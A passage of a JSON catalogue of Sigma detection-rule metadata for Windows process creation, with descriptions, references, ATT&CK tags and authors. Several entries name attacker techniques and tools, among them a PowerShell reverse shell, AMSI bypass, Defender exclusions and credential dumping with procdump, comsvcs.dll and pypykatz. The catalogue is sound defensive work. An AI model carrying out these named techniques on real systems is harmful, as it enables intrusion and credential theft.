"Powershell Defender Exclusion", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/04/29", - "filename": "proc_creation_win_powershell_defender_exclusion.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll", - "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "value": "Detection of PowerShell Execution via DLL", - "meta": { - "refs": [ - "https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dll_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2018/08/25", - "filename": "proc_creation_win_powershell_dll_execution.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "uuid": "b3512211-c67e-4707-bedc-66efc7848863", - "value": "PowerShell Downgrade Attack", - "meta": { - "refs": [ - "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/03/20", - "filename": "proc_creation_win_powershell_downgrade_attack.yml", - "author": "Harish Segar (rule)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Powershell process that contains download commands in its command line string", - "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", - "value": "PowerShell Download from URL", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_powershell_download.yml", - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "uuid": "e6c54d94-498c-4562-a37c-b469d8e9a275", - "value": "Suspicious PowerShell Download and Execute Pattern", - "meta": { - "refs": [ - "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", - "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/02/28", - "filename": "proc_creation_win_powershell_download_patterns.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Software installers that pull packages from remote systems and execute them" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious FromBase64String expressions in command line arguments", - "uuid": "e32d4572-9826-4738-b651-95fa63747e8a", - "value": "FromBase64String Command Line", - "meta": { - "refs": [ - "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" - ], - "tags": [ - "attack.t1027", - "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" - ], - "creation_date": "2020/01/29", - "filename": "proc_creation_win_powershell_frombase64string.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative script libraries" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", - "uuid": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", - "value": "PowerShell Get-Clipboard Cmdlet Via CLI", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/16", - "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ], - "creation_date": "2020/05/02", - "filename": "proc_creation_win_powershell_get_clipboard.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", - "value": "Execution of Powershell Script in Public Folder", - "meta": { - "refs": [ - "https://www.mandiant.com/resources/evolution-of-fin7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" - ], - "tags": "No established tags", - "creation_date": "2022/04/06", - "filename": "proc_creation_win_powershell_public_folder.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell", - "uuid": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "value": "Powershell Reverse Shell Connection", - "meta": { - "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/03/03", - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", - "author": "FPT.EagleEye, wagga", - "level": "high", - "falsepositive": [ - "Administrative might use this function for checking network connectivity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data by HAFNIUM", - "uuid": "25676e10-2121-446e-80a4-71ff8506af47", - "value": "Exchange PowerShell Snap-Ins Used by HAFNIUM", - "meta": { - "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" - ], - "creation_date": "2021/03/03", - "filename": "proc_creation_win_powershell_snapins_hafnium.yml", - "author": "FPT.EagleEye", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "uuid": "36210e0d-5b19-485d-a087-c096088885f0", - "value": "Suspicious PowerShell Parameter Substring", - "meta": { - "refs": [ - "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml", - "author": "Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "uuid": "bb780e0c-16cf-4383-8383-1e5471db6cf9", - "value": "Suspicious XOR Encoded PowerShell Command Line", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1140", - "attack.t1027" - ], - "creation_date": "2018/09/05", - "filename": "proc_creation_win_powershell_xor_commandline.yml", - "author": "Sami Ruohonen, Harish Segar (improvement), Tim Shelton", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", - "value": "Default PowerSploit and Empire Schtasks Persistence", - "meta": { - "refs": [ - "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" - ], - "creation_date": "2018/03/06", - "filename": "proc_creation_win_powersploit_empire_schtasks.yml", - "author": "Markus Neis, @Karneades", - "level": "high", - "falsepositive": [ - "False positives are possible, depends on organisation and processes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", - "uuid": "a34f79a3-8e5f-4cc3-b765-de00695452c2", - "value": "PowerTool Execution", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", - "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", - "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/11/29", - "filename": "proc_creation_win_powertool_execution.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", - "uuid": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", - "value": "Privilege Escalation via Named Pipe Impersonation", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_priv_escalation_via_named_pipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_priv_escalation_via_named_pipe.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Other programs that cause these patterns (please report)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the SysInternals Procdump utility", - "uuid": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", - "value": "Procdump Usage", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": "2021/08/16", - "filename": "proc_creation_win_procdump.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate use of procdump by a developer or administrator" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", - "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737", - "value": "Procdump Evasion", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1480785527901204481", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": "2022/01/11", - "filename": "proc_creation_win_procdump_evasion.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Cases in which procdump just gets copied to a different directory without any renaming" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", - "value": "Process Dump via RdrLeakDiag.exe", - "meta": { - "refs": [ - "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2021/09/24", - "filename": "proc_creation_win_process_dump_rdrleakdiag.yml", - "author": "Cedric MAURUGEON", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process memory dump via comsvcs.dll and rundll32 using different techniques (ordinal, minidump function...etc)", - "uuid": "646ea171-dded-4578-8a4d-65e9822892e3", - "value": "Process Dump via Rundll32 and Comsvcs.dll", - "meta": { - "refs": [ - "https://twitter.com/shantanukhande/status/1229348874298388484", - "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", - "https://twitter.com/Hexacorn/status/1224848930795552769", - "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", - "https://twitter.com/SBousseaden/status/1167417096374050817", - "https://twitter.com/Wietze/status/1542107456507203586", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" - ], - "creation_date": "2020/02/18", - "filename": "proc_creation_win_process_dump_rundll32_comsvcs.yml", - "author": "Florian Roth, Modexp, Nasreddine Bencherchali (update)", - "level": "high", - "falsepositive": [ - "Unlikely, because no one should dump the process memory in that way" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", - "value": "CreateDump Process Dump", - "meta": { - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://twitter.com/bopin2020/status/1366400799199272960", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": "2022/01/04", - "filename": "proc_creation_win_proc_dump_createdump.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Command lines that use the same flags" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a Visual Studio bundled tool named DumpMinitool.exe", - "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42", - "value": "DumpMinitool Usage", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg", - "https://twitter.com/mrd0x/status/1511489821247684615", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": "2022/04/06", - "filename": "proc_creation_win_proc_dump_dumpminitool.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "uuid": "6355a919-2e97-4285-a673-74645566340d", - "value": "RdrLeakDiag Process Dump", - "meta": { - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": "2022/01/04", - "filename": "proc_creation_win_proc_dump_rdrleakdiag.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", - "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", - "value": "Suspicious DumpMinitool Usage", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1511415432888131586", - "https://twitter.com/mrd0x/status/1511489821247684615", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": "2022/04/06", - "filename": "proc_creation_win_proc_dump_susp_dumpminitool.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect suspicious parent processes of well-known Windows processes", - "uuid": "96036718-71cc-4027-a538-d1587e0006a7", - "value": "Windows Processes Suspicious Parent Directory", - "meta": { - "refs": [ - "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", - "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", - "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", - "https://attack.mitre.org/techniques/T1036/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036.005" - ], - "creation_date": "2019/02/23", - "filename": "proc_creation_win_proc_wrong_parent.yml", - "author": "vburov", - "level": "low", - "falsepositive": [ - "Some security products seem to spawn these" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.", - "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", - "value": "ProtocolHandler.exe Downloaded Suspicious File", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_protocolhandler_susp_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/07/13", - "filename": "proc_creation_win_protocolhandler_susp_file.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", - "value": "Proxy Execution via Wuauclt", - "meta": { - "refs": [ - "https://dtm.uk/wuauclt/", - "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_proxy_execution_wuauclt.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth, Sreeman, FPT.EagleEye Team", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a PsExec service start", - "uuid": "3ede524d-21cc-472d-a3ce-d21b568d8db7", - "value": "PsExec Service Start", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml" - ], - "tags": [ - "attack.execution", - "attack.s0029", - "attack.t1569.002" - ], - "creation_date": "2018/03/13", - "filename": "proc_creation_win_psexesvc_start.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.", - "uuid": "4f927692-68b5-4267-871b-073c45f4f6fe", - "value": "PowerShell AMSI Bypass Pattern", - "meta": { - "refs": [ - "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psh_amsi_bypass_pattern_nov22.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" - ], - "creation_date": "2022/11/04", - "filename": "proc_creation_win_psh_amsi_bypass_pattern_nov22.yml", - "author": "@Kostastsale", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", - "value": "DefenderCheck Usage", - "meta": { - "refs": [ - "https://github.com/matterpreter/DefenderCheck", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.005" - ], - "creation_date": "2022/08/30", - "filename": "proc_creation_win_pua_defendercheck.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", - "value": "Seatbelt PUA Tool", - "meta": { - "refs": [ - "https://github.com/GhostPack/Seatbelt", - "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" - ], - "creation_date": "2022/10/18", - "filename": "proc_creation_win_pua_seatbelt.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", - "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "value": "Parent in Public Folder Suspicious Process", - "meta": { - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/25", - "filename": "proc_creation_win_public_folder_parent.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", - "value": "PurpleSharp Indicator", - "meta": { - "refs": [ - "https://github.com/mvelazc0/PurpleSharp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml" - ], - "tags": [ - "attack.t1587", - "attack.resource_development" - ], - "creation_date": "2021/06/18", - "filename": "proc_creation_win_purplesharp_indicators.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", - "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "value": "Registry Parse with Pypykatz", - "meta": { - "refs": [ - "https://github.com/skelsec/pypykatz", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2022/01/05", - "filename": "proc_creation_win_pypykatz.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects python spawning a pretty tty", - "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", - "value": "Python Spawning Pretty TTY on Windows", - "meta": { - "refs": [ - "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/03", - "filename": "proc_creation_win_python_pty_spawn.yml", - "author": "Nextron Systems", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "uuid": "0685b176-c816-4837-8e7b-1216f346636b", - "value": "Quarks PwDump Usage", - "meta": { - "refs": [ - "https://github.com/quarkslab/quarkspwdump", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2022/09/05", - "filename": "proc_creation_win_quarks_pwdump.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may interact with the Windows Registry to gather information about credentials, the system, configuration, and installed software.", - "uuid": "970007b7-ce32-49d0-a4a4-fbef016950bd", - "value": "Query Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_registry.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.t1007" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_query_registry.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "low", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", - "uuid": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", - "value": "Query Usage To Exfil Data", - "meta": { - "refs": [ - "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/01", - "filename": "proc_creation_win_query_session_exfil.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This command line patterns found in BlackByte Ransomware operations", - "uuid": "999e8307-a775-4d5f-addc-4855632335be", - "value": "BlackByte Ransomware Patterns", - "meta": { - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/25", - "filename": "proc_creation_win_ransom_blackbyte.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "uuid": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "value": "Raspberry Robin Dot Ending File", - "meta": { - "refs": [ - 